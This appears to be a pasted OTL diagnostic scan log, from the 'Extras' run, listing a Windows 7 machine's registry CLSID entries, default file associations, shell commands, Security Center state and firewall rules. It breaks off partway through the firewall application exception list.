[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] /64
 
[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
"" = C:\Windows\SysNative\shell32.dll -- [2014/03/24 21:43:12 | 014,175,744 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
"" = %SystemRoot%\system32\shell32.dll -- [2014/03/24 21:09:54 | 012,874,240 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\fastprox.dll -- [2009/07/13 20:40:51 | 000,909,312 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]
"" = %systemroot%\system32\wbem\fastprox.dll -- [2010/11/20 22:24:25 | 000,606,208 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\wbemess.dll -- [2009/07/13 20:41:56 | 000,505,856 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Both
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]
 
========== Alternate Data Streams ==========
 
@Alternate Data Stream - 147 bytes -> C:\ProgramData\TEMP:890CC2F3

< End of report >
 

and here is extra

 

OTL Extras logfile created on: 6/15/2014 6:03:43 PM - Run 2
OTL by OldTimer - Version 3.2.69.0     Folder = C:\Users\COCHRAN\Desktop
64bit- Home Premium Edition Service Pack 1 (Version = 6.1.7601) - Type = NTWorkstation
Internet Explorer (Version = 9.11.9600.16428)
Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy
 
7.98 Gb Total Physical Memory | 5.02 Gb Available Physical Memory | 62.93% Memory free
15.96 Gb Paging File | 5.27 Gb Available in Paging File | 33.05% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]
 
%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 931.41 Gb Total Space | 252.62 Gb Free Space | 27.12% Space Free | Partition Type: NTFS
Unable to calculate disk information.
Drive E: | 3.66 Gb Total Space | 0.00 Gb Free Space | 0.00% Space Free | Partition Type: CDFS
 
Computer Name: COCHRAN-PC | User Name: COCHRAN | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: All users | Include 64bit Scans
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days
 
========== Extra Registry (All) ==========
 
 
========== File Associations ==========
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]
.chm[@ = chm.file] -- C:\Windows\hh.exe (Microsoft Corporation)
.cpl[@ = cplfile] -- C:\Windows\SysNative\control.exe (Microsoft Corporation)
.hlp[@ = hlpfile] -- C:\Windows\winhlp32.exe (Microsoft Corporation)
.hta[@ = htafile] -- C:\Windows\SysWOW64\mshta.exe (Microsoft Corporation)
.html[@ = ChromeHTML] -- C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.)
.inf[@ = inffile] -- C:\Windows\SysNative\NOTEPAD.EXE (Microsoft Corporation)
.ini[@ = inifile] -- C:\Windows\SysNative\NOTEPAD.EXE (Microsoft Corporation)
.url[@ = InternetShortcut] -- C:\Windows\SysNative\rundll32.exe (Microsoft Corporation)
.js[@ = JSFile] -- C:\Windows\SysNative\WScript.exe (Microsoft Corporation)
.jse[@ = JSEFile] -- C:\Windows\SysNative\WScript.exe (Microsoft Corporation)
.reg[@ = regfile] -- C:\Windows\regedit.exe (Microsoft Corporation)
.txt[@ = txtfile] -- C:\Windows\SysNative\NOTEPAD.EXE (Microsoft Corporation)
.vbe[@ = VBEFile] -- C:\Windows\SysNative\WScript.exe (Microsoft Corporation)
.vbs[@ = VBSFile] -- C:\Windows\SysNative\WScript.exe (Microsoft Corporation)
.wsf[@ = WSFFile] -- C:\Windows\SysNative\WScript.exe (Microsoft Corporation)
.wsh[@ = WSHFile] -- C:\Windows\SysNative\WScript.exe (Microsoft Corporation)
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]
.bat [@ = batfile] -- "%1" %*
.chm [@ = chm.file] -- C:\Windows\hh.exe (Microsoft Corporation)
.cmd [@ = cmdfile] -- "%1" %*
.com [@ = comfile] -- "%1" %*
.cpl [@ = cplfile] -- C:\Windows\SysWow64\control.exe (Microsoft Corporation)
.exe [@ = exefile] -- "%1" %*
.hlp [@ = hlpfile] -- C:\Windows\winhlp32.exe (Microsoft Corporation)
.hta [@ = htafile] -- C:\Windows\SysWOW64\mshta.exe (Microsoft Corporation)
.html [@ = ChromeHTML] -- C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.)
.inf [@ = inffile] -- C:\Windows\SysWow64\NOTEPAD.EXE (Microsoft Corporation)
.ini [@ = inifile] -- C:\Windows\SysWow64\NOTEPAD.EXE (Microsoft Corporation)
.url [@ = InternetShortcut] -- C:\Windows\SysWow64\rundll32.exe (Microsoft Corporation)
.js [@ = JSFile] -- C:\Windows\SysWow64\WScript.exe (Microsoft Corporation)
.jse [@ = JSEFile] -- C:\Windows\SysWow64\WScript.exe (Microsoft Corporation)
.pif [@ = piffile] -- "%1" %*
.reg [@ = regfile] -- C:\Windows\SysWow64\regedit.exe (Microsoft Corporation)
.scr [@ = scrfile] -- "%1" /S
.txt [@ = txtfile] -- C:\Windows\SysWow64\NOTEPAD.EXE (Microsoft Corporation)
.vbe [@ = VBEFile] -- C:\Windows\SysWow64\WScript.exe (Microsoft Corporation)
.vbs [@ = VBSFile] -- C:\Windows\SysWow64\WScript.exe (Microsoft Corporation)
.wsf [@ = WSFFile] -- C:\Windows\SysWow64\WScript.exe (Microsoft Corporation)
.wsh [@ = WSHFile] -- C:\Windows\SysWow64\WScript.exe (Microsoft Corporation)
 
[HKEY_USERS\S-1-5-21-1681504733-1289828258-2380439542-1000\SOFTWARE\Classes\<extension>]
.html [@ = FirefoxHTML] -- C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation)
 
========== Shell Spawning ==========
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]
batfile [edit] -- %SystemRoot%\System32\NOTEPAD.EXE %1 (Microsoft Corporation)
batfile [open] -- "%1" %*
batfile [print] -- %SystemRoot%\System32\NOTEPAD.EXE /p %1 (Microsoft Corporation)
chm.file [open] -- "%SystemRoot%\hh.exe" %1 (Microsoft Corporation)
cmdfile [edit] -- %SystemRoot%\System32\NOTEPAD.EXE %1 (Microsoft Corporation)
cmdfile [open] -- "%1" %*
cmdfile [print] -- %SystemRoot%\System32\NOTEPAD.EXE /p %1 (Microsoft Corporation)
comfile [open] -- "%1" %*
cplfile [cplopen] -- %SystemRoot%\System32\control.exe "%1",%* (Microsoft Corporation)
exefile [open] -- "%1" %*
helpfile [open] -- Reg Error: Key error.
hlpfile [open] -- %SystemRoot%\winhlp32.exe %1 (Microsoft Corporation)
htafile [open] -- C:\Windows\SysWOW64\mshta.exe "%1" %* (Microsoft Corporation)
htmlfile [edit] -- Reg Error: Key error.
htmlfile [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
htmlfile [opennew] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
htmlfile [print] -- "%systemroot%\system32\rundll32.exe" "%systemroot%\system32\mshtml.dll",PrintHTML "%1"
http [open] -- "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" -- "%1" (Google Inc.)
https [open] -- "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" -- "%1" (Google Inc.)
inffile [install] -- %SystemRoot%\System32\InfDefaultInstall.exe "%1" (Microsoft Corporation)
inffile [open] -- %SystemRoot%\system32\NOTEPAD.EXE %1 (Microsoft Corporation)
inffile [print] -- %SystemRoot%\system32\NOTEPAD.EXE /p %1 (Microsoft Corporation)
inifile [open] -- %SystemRoot%\system32\NOTEPAD.EXE %1 (Microsoft Corporation)
inifile [print] -- %SystemRoot%\system32\NOTEPAD.EXE /p %1 (Microsoft Corporation)
InternetShortcut [open] -- "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL %l (Microsoft Corporation)
InternetShortcut [print] -- "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\mshtml.dll",PrintHTML "%1" (Microsoft Corporation)
jsfile [edit] -- C:\Windows\System32\Notepad.exe %1 (Microsoft Corporation)
jsfile [open] -- C:\Windows\System32\WScript.exe "%1" %* (Microsoft Corporation)
jsfile [print] -- C:\Windows\System32\Notepad.exe /p %1 (Microsoft Corporation)
jsefile [edit] -- C:\Windows\System32\Notepad.exe %1 (Microsoft Corporation)
jsefile [open] -- C:\Windows\System32\WScript.exe "%1" %* (Microsoft Corporation)
jsefile [print] -- C:\Windows\System32\Notepad.exe /p %1 (Microsoft Corporation)
piffile [open] -- "%1" %*
regfile [edit] -- %SystemRoot%\system32\notepad.exe "%1" (Microsoft Corporation)
regfile [open] -- regedit.exe "%1" (Microsoft Corporation)
regfile [merge] -- Reg Error: Key error.
regfile [print] -- %SystemRoot%\system32\notepad.exe /p "%1" (Microsoft Corporation)
scrfile [config] -- "%1"
scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l
scrfile [open] -- "%1" /S
txtfile [edit] -- Reg Error: Key error.
txtfile [open] -- %SystemRoot%\system32\NOTEPAD.EXE %1 (Microsoft Corporation)
txtfile [print] -- %SystemRoot%\system32\NOTEPAD.EXE /p %1 (Microsoft Corporation)
txtfile [printto] -- %SystemRoot%\system32\notepad.exe /pt "%1" "%2" "%3" "%4" (Microsoft Corporation)
vbefile [edit] -- "%SystemRoot%\System32\Notepad.exe" %1 (Microsoft Corporation)
vbefile [open] -- "%SystemRoot%\System32\WScript.exe" "%1" %* (Microsoft Corporation)
vbefile [print] -- "%SystemRoot%\System32\Notepad.exe" /p %1 (Microsoft Corporation)
vbsfile [edit] -- "%SystemRoot%\System32\Notepad.exe" %1 (Microsoft Corporation)
vbsfile [open] -- "%SystemRoot%\System32\WScript.exe" "%1" %* (Microsoft Corporation)
vbsfile [print] -- "%SystemRoot%\System32\Notepad.exe" /p %1 (Microsoft Corporation)
wsffile [edit] -- "%SystemRoot%\System32\Notepad.exe" %1 (Microsoft Corporation)
wsffile [open] -- "%SystemRoot%\System32\WScript.exe" "%1" %* (Microsoft Corporation)
wsffile [print] -- "%SystemRoot%\System32\Notepad.exe" /p %1 (Microsoft Corporation)
wshfile [open] -- "%SystemRoot%\System32\WScript.exe" "%1" %* (Microsoft Corporation)
Unknown [openas] -- %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,OpenAs_RunDLL %1
Directory [Bridge] -- C:\Program Files\Adobe\Adobe Bridge CS6 (64 Bit)\Bridge.exe "%L" (Adobe Systems, Inc.)
Directory [cmd] -- cmd.exe /s /k pushd "%V" (Microsoft Corporation)
Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [open] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [explore] -- Reg Error: Value error.
Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Applications\iexplore.exe [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
CLSID\{871C5380-42A0-1069-A2EA-08002B30309D} [OpenHomePage] -- "C:\Program Files\Internet Explorer\iexplore.exe" (Microsoft Corporation)
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]
batfile [edit] -- %SystemRoot%\System32\NOTEPAD.EXE %1 (Microsoft Corporation)
batfile [open] -- "%1" %*
batfile [print] -- %SystemRoot%\System32\NOTEPAD.EXE /p %1 (Microsoft Corporation)
chm.file [open] -- "%SystemRoot%\hh.exe" %1 (Microsoft Corporation)
cmdfile [edit] -- %SystemRoot%\System32\NOTEPAD.EXE %1 (Microsoft Corporation)
cmdfile [open] -- "%1" %*
cmdfile [print] -- %SystemRoot%\System32\NOTEPAD.EXE /p %1 (Microsoft Corporation)
comfile [open] -- "%1" %*
cplfile [cplopen] -- %SystemRoot%\System32\control.exe "%1",%* (Microsoft Corporation)
exefile [open] -- "%1" %*
helpfile [open] -- Reg Error: Key error.
hlpfile [open] -- %SystemRoot%\winhlp32.exe %1 (Microsoft Corporation)
htafile [open] -- C:\Windows\SysWOW64\mshta.exe "%1" %* (Microsoft Corporation)
htmlfile [edit] -- Reg Error: Key error.
htmlfile [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
htmlfile [opennew] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
htmlfile [print] -- "%systemroot%\system32\rundll32.exe" "%systemroot%\system32\mshtml.dll",PrintHTML "%1"
http [open] -- "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" -- "%1" (Google Inc.)
https [open] -- "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" -- "%1" (Google Inc.)
inffile [install] -- %SystemRoot%\System32\InfDefaultInstall.exe "%1" (Microsoft Corporation)
inffile [open] -- %SystemRoot%\system32\NOTEPAD.EXE %1 (Microsoft Corporation)
inffile [print] -- %SystemRoot%\system32\NOTEPAD.EXE /p %1 (Microsoft Corporation)
inifile [open] -- %SystemRoot%\system32\NOTEPAD.EXE %1 (Microsoft Corporation)
inifile [print] -- %SystemRoot%\system32\NOTEPAD.EXE /p %1 (Microsoft Corporation)
InternetShortcut [open] -- "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL %l (Microsoft Corporation)
InternetShortcut [print] -- "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\mshtml.dll",PrintHTML "%1" (Microsoft Corporation)
jsfile [edit] -- C:\Windows\System32\Notepad.exe %1 (Microsoft Corporation)
jsfile [open] -- C:\Windows\System32\WScript.exe "%1" %* (Microsoft Corporation)
jsfile [print] -- C:\Windows\System32\Notepad.exe /p %1 (Microsoft Corporation)
jsefile [edit] -- C:\Windows\System32\Notepad.exe %1 (Microsoft Corporation)
jsefile [open] -- C:\Windows\System32\WScript.exe "%1" %* (Microsoft Corporation)
jsefile [print] -- C:\Windows\System32\Notepad.exe /p %1 (Microsoft Corporation)
piffile [open] -- "%1" %*
regfile [edit] -- %SystemRoot%\system32\notepad.exe "%1" (Microsoft Corporation)
regfile [open] -- regedit.exe "%1" (Microsoft Corporation)
regfile [merge] -- Reg Error: Key error.
regfile [print] -- %SystemRoot%\system32\notepad.exe /p "%1" (Microsoft Corporation)
scrfile [config] -- "%1"
scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l
scrfile [open] -- "%1" /S
txtfile [edit] -- Reg Error: Key error.
txtfile [open] -- %SystemRoot%\system32\NOTEPAD.EXE %1 (Microsoft Corporation)
txtfile [print] -- %SystemRoot%\system32\NOTEPAD.EXE /p %1 (Microsoft Corporation)
txtfile [printto] -- %SystemRoot%\system32\notepad.exe /pt "%1" "%2" "%3" "%4" (Microsoft Corporation)
vbefile [edit] -- "%SystemRoot%\System32\Notepad.exe" %1 (Microsoft Corporation)
vbefile [open] -- "%SystemRoot%\System32\WScript.exe" "%1" %* (Microsoft Corporation)
vbefile [print] -- "%SystemRoot%\System32\Notepad.exe" /p %1 (Microsoft Corporation)
vbsfile [edit] -- "%SystemRoot%\System32\Notepad.exe" %1 (Microsoft Corporation)
vbsfile [open] -- "%SystemRoot%\System32\WScript.exe" "%1" %* (Microsoft Corporation)
vbsfile [print] -- "%SystemRoot%\System32\Notepad.exe" /p %1 (Microsoft Corporation)
wsffile [edit] -- "%SystemRoot%\System32\Notepad.exe" %1 (Microsoft Corporation)
wsffile [open] -- "%SystemRoot%\System32\WScript.exe" "%1" %* (Microsoft Corporation)
wsffile [print] -- "%SystemRoot%\System32\Notepad.exe" /p %1 (Microsoft Corporation)
wshfile [open] -- "%SystemRoot%\System32\WScript.exe" "%1" %* (Microsoft Corporation)
Unknown [openas] -- %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,OpenAs_RunDLL %1
Directory [Bridge] -- C:\Program Files\Adobe\Adobe Bridge CS6 (64 Bit)\Bridge.exe "%L" (Adobe Systems, Inc.)
Directory [cmd] -- cmd.exe /s /k pushd "%V" (Microsoft Corporation)
Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [open] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [explore] -- Reg Error: Value error.
Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Applications\iexplore.exe [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
CLSID\{871C5380-42A0-1069-A2EA-08002B30309D} [OpenHomePage] -- Reg Error: Value error.
 
========== Security Center Settings ==========
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
"cval" = 1
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring]
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc]
"VistaSp1" = 28 4D B2 76 41 04 CA 01  [binary data]
"AntiVirusOverride" = 0
"AntiSpywareOverride" = 0
"FirewallOverride" = 0
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc\Vol]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc]
 
========== Firewall Settings ==========
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile]
"EnableFirewall" = 1
"DisableNotifications" = 0
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall" = 1
"DisableNotifications" = 0
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile]
"EnableFirewall" = 1
"DisableNotifications" = 0
 
========== Authorized Applications List ==========
 
 
========== Vista Active Open Ports Exception List ==========
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{059E7468-A643-4C7A-A920-AD8B0BC93E79}" = lport=67 | protocol=17 | dir=in | name=rtldhcp-port |
"{0B3BFE3F-81E2-4EBD-8938-D91ECA48561B}" = lport=138 | protocol=17 | dir=in | app=system |
"{1821813B-F536-483D-8F9C-2C1062213439}" = lport=1900 | protocol=17 | dir=in | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe |
"{18743695-EF0D-4320-8A7E-FB98E8609D8A}" = lport=3702 | protocol=17 | dir=in | svc=fdphost | app=%systemroot%\system32\svchost.exe |
"{1E7FF0C9-60F7-484B-9D5D-890E492BDFFA}" = rport=138 | protocol=17 | dir=out | app=system |
"{345093AF-C272-46C1-A2A1-A913512436E1}" = lport=1900 | protocol=17 | dir=in | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe |
"{3AB503FF-B74F-49CD-B4CD-2DC0C94B6D90}" = rport=139 | protocol=6 | dir=out | app=system |
"{3C08DC29-C795-4B22-8C02-1EB82687E6AD}" = rport=10243 | protocol=6 | dir=out | app=system |
"{417A5657-AC7B-4D2A-B70D-E4ACDC82B527}" = lport=53 | protocol=17 | dir=in | name=rtldns-port-2 |
"{458134DD-3F57-46D5-AA74-112BC8E960F2}" = lport=25565 | protocol=6 | dir=in | name=minecraft tcp |
"{4A1CA537-ED63-4529-8145-67518AFAE285}" = lport=19540 | protocol=17 | dir=in | name=sxuptp |
"{4BEB2358-FE7F-40E1-842F-C57B900F4E03}" = lport=5355 | protocol=17 | dir=in | svc=dnscache | app=%systemroot%\system32\svchost.exe |
"{53367043-EF02-45C2-A8C3-6B017D3517E7}" = lport=1542 | protocol=6 | dir=in | name=realtek wps tcp prot |
"{5445CF58-4484-428B-8CB0-C3BDEE1B0C57}" = rport=137 | protocol=17 | dir=out | app=system |
"{569EE2A9-29DC-4921-858A-5CFE31318A46}" = lport=rpc | protocol=6 | dir=in | svc=spooler | app=%systemroot%\system32\spoolsv.exe |
"{59B3F080-AE72-4CB5-B9CA-45787AF47B4A}" = lport=53 | protocol=17 | dir=in | name=realtek ap udp prot |
"{5A87A549-C9D0-4DEA-AC08-CF75BDE7412D}" = rport=3702 | protocol=17 | dir=out | svc=fdphost | app=%systemroot%\system32\svchost.exe |
"{5D9C632A-D783-459D-B1B9-FB55F5C312C5}" = lport=139 | protocol=6 | dir=in | app=system |
"{68938258-4A8A-4BC7-8267-D9BFD4B1EB70}" = rport=5355 | protocol=17 | dir=out | svc=dnscache | app=%systemroot%\system32\svchost.exe |
"{6C786A90-9262-4FD2-966D-925499F47E20}" = lport=1542 | protocol=17 | dir=in | name=realtek wps udp prot |
"{7A2568C6-1DE5-4341-80F1-C416AF37A57C}" = lport=1900 | protocol=17 | dir=in | name=windows live communications platform (ssdp) |
"{7C02BBA7-AF22-4BE9-8149-4A6548076861}" = lport=10243 | protocol=6 | dir=in | app=system |
"{7F47FE26-4B7C-4D45-A769-82CB4D6760EA}" = lport=2869 | protocol=6 | dir=in | name=windows live communications platform (upnp) |
"{8419ECE9-62CC-4A01-8098-2D814AC657B8}" = lport=5355 | protocol=17 | dir=in | svc=dnscache | app=%systemroot%\system32\svchost.exe |
"{8DA5F2A9-604C-4025-BDB0-390185060AD9}" = rport=2177 | protocol=17 | dir=out | svc=qwave | app=%systemroot%\system32\svchost.exe |
"{98EEA690-E348-4692-8677-C719BA958945}" = rport=1900 | protocol=17 | dir=out | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe |
"{99EA1F76-C301-47D2-B8A1-240D73AD031E}" = lport=5355 | protocol=17 | dir=in | svc=dnscache | app=%systemroot%\system32\svchost.exe |
"{9C0DEB70-B8CC-4368-BDB5-9CA2C1A6A2A0}" = lport=53 | protocol=6 | dir=in | name=rtldns-port |
"{9CCA4C81-6345-4723-B2CC-7E4101F53834}" = rport=5355 | protocol=17 | dir=out | svc=dnscache | app=%systemroot%\system32\svchost.exe |
"{A409909F-06AA-446F-8A83-7AE733A3E00A}" = lport=2177 | protocol=6 | dir=in | svc=qwave | app=%systemroot%\system32\svchost.exe |
"{A5DFBC54-153E-456B-8360-3EB25E169B1B}" = lport=2177 | protocol=17 | dir=in | svc=qwave | app=%systemroot%\system32\svchost.exe |
"{AC9110B3-ECA1-4AE8-B75F-AF3FEB1D86CD}" = lport=137 | protocol=17 | dir=in | app=system |
"{B6151431-67C1-4531-B3C5-B6E941B1B27B}" = lport=3702 | protocol=17 | dir=in | svc=fdrespub | app=%systemroot%\system32\svchost.exe |
"{B9AD8332-0238-4FDF-820D-B0EEDE8F4EF2}" = rport=3702 | protocol=17 | dir=out | svc=fdrespub | app=%systemroot%\system32\svchost.exe |
"{C67C7770-58E1-41A7-B4C8-693E8BB87D4B}" = lport=68 | protocol=17 | dir=in | name=rtldhcp-port-2 |
"{CBA7E827-ABED-44EA-9000-D3A3E4EFB633}" = rport=445 | protocol=6 | dir=out | app=system |
"{D1093A38-8BC9-46A9-BFA5-E9584C3113DD}" = rport=5355 | protocol=17 | dir=out | svc=dnscache | app=%systemroot%\system32\svchost.exe |
"{D6363730-1A7F-4B5A-9021-C078D7CFF288}" = lport=25565 | protocol=17 | dir=in | name=minecraft udp |
"{DCC92304-0BBC-457C-B623-06547D407229}" = lport=445 | protocol=6 | dir=in | app=system |
"{DDD7FDB4-84B0-4EC3-9636-865D2C784186}" = lport=rpc-epmap | protocol=6 | dir=in | svc=rpcss | [email protected],-28539 |
"{E2C8B107-63EA-4604-AABC-DEF214D73605}" = lport=2869 | protocol=6 | dir=in | app=system |
"{ED99B387-4260-49FE-8049-78C4A81C082D}" = rport=2177 | protocol=6 | dir=out | svc=qwave | app=%systemroot%\system32\svchost.exe |
"{FDF5D11C-4B7A-43EC-8A7C-D2A68C47607B}" = rport=1900 | protocol=17 | dir=out | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe |
 
========== Vista Active Application Exception List ==========
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{02481C02-AE13-4835-800D-6E5B4D5AE768}" = dir=in | app=c:\program files (x86)\itunes\itunes.exe |
"{041E5738-5E02-4B3C-86B5-E7F9DB710F11}" = protocol=17 | dir=in | app=c:\program files (x86)\avg\avg2014\avgnsa.exe |
"{05FFC5B4-D77B-4C8E-AA40-F5ED767955AF}" = protocol=6 | dir=in | app=c:\program files (x86)\microsoft lifecam\lifetray.exe |
"{06977ABB-50F5-414B-A0AE-600778ADB18D}" = protocol=17 | dir=in | app=c:\program files (x86)\avg\avg2014\avgemca.exe |
"{0836E0C7-5CB1-4D85-8557-7CBBB400147E}" = protocol=17 | dir=in | app=c:\program files (x86)\avg\avg2014\avgmfapx.exe |
"{0CF940B7-CF16-4B75-93D7-3022E2B789EC}" = protocol=6 | dir=in | app=c:\udk\udk-2013-02\binaries\win64\udk.exe |
"{0E8CC433-9C46-43AB-B960-F07D3AA86AC8}" = protocol=17 | dir=in | app=c:\udk\udk-2013-02\binaries\win64\udk.exe |
"{0E966294-4CDC-46E8-A179-2089E24B608D}" = protocol=58 | dir=in | app=system |
"{111CA3B9-1187-4EB0-8CD6-DBA77C3D975C}" = protocol=58 | dir=out | [email protected],-28546 |
"{12651650-F126-4229-89C1-EABF6BD3D7A3}" = protocol=17 | dir=out | app=%programfiles%\windows media player\wmplayer.exe |
"{1272EAFB-F0A1-4BE1-811A-7733CB16BAC3}" = dir=in | app=c:\program files (x86)\hp\digital imaging\bin\hposid01.exe |
"{128A2EAC-5C42-4448-88E6-72681DD6A1D0}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steamapps\common\resident evil revelations\rerev.exe |
"{14308CB8-0B33-444A-AD39-1512C7E31148}" = protocol=1 | dir=out | [email protected],-28544 |
"{14899002-C404-4099-B267-6161EF8B4B2C}" = protocol=6 | dir=in | app=c:\program files (x86)\avg\avg2014\avgdiagex.exe |
"{16C8BDB5-EB60-4CC2-8063-721394CF1CB4}" = dir=in | app=c:\program files (x86)\hp\digital imaging\bin\hpofxm08.exe |
"{193F0D28-7200-43C0-928A-8D5B54318A4F}" = dir=in | app=c:\program files (x86)\hp\digital imaging\bin\hpqusgh.exe |
"{19EC0F7E-7D90-445E-A544-BE13828C78A4}" = dir=in | app=c:\program files (x86)\hp\digital imaging\bin\hposfx08.exe |
"{1A0556F1-D04F-4F87-9F54-40C70CD31210}" = protocol=6 | dir=out | svc=upnphost | app=%systemroot%\system32\svchost.exe |
"{1BCAC28F-7EF0-4A73-9F85-066DF66596D2}" = protocol=6 | dir=in | app=c:\program files (x86)\realtek\11n usb wireless lan utility\rtwlan.exe |
"{1D102693-EC80-4862-A9E6-A8C1B464B987}" = protocol=6 | dir=in | app=c:\program files\java\jre7\bin\javaw.exe |
"{1D32E893-92C2-4199-A238-51AAC09C1765}" = protocol=6 | dir=in | app=c:\users\cochran\appdata\roaming\utorrent\utorrent.exe |
"{1D74A973-D61E-4571-AB96-CD8446A2E98E}" = protocol=6 | dir=in | app=c:\program files (x86)\avg\avg2014\avgmfapx.exe |
"{2630582E-2172-4FD6-A91A-8E5FF90040AC}" = protocol=17 | dir=in | app=c:\program files (x86)\microsoft lifecam\lifeexp.exe |
"{28509EA1-A603-4C46-BA85-EF4587D5B6F3}" = protocol=6 | dir=in | app=c:\program files (x86)\avg\avg2014\avgemca.exe |
"{2850C1E6-8247-4576-98D6-163E60151934}" = dir=in | app=c:\program files (x86)\hp\digital imaging\bin\hpqgplgtupl.exe |
"{2892EC8F-9A77-43C0-94BD-1E7F2DC28FAF}" = dir=in | app=c:\program files (x86)\hp\digital imaging\bin\hpqfxt08.exe |
"{2BBA8CBD-7CA7-4E9C-A513-EDC589B8A50D}" = protocol=17 | dir=in | app=%programfiles%\windows media player\wmplayer.exe |
"{2C462D70-7B79-4248-96B6-3EF3BB5D0B48}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steam.exe |
"{3306E7C8-B417-490D-8B24-D51B8204B3B0}" = protocol=6 | dir=in | app=c:\udk\udk-2013-02\binaries\win32\udk.exe |
"{33FC7B0D-6863-419D-8380-495484AFC947}" = dir=in | app=c:\program files (x86)\hp\digital imaging\bin\hpqste08.exe |
"{36DE298D-5B0B-4838-8DF3-A3BDC6EC11B4}" = dir=in | app=c:\program files (x86)\hp\digital imaging\smart web printing\smartwebprintexe.exe |
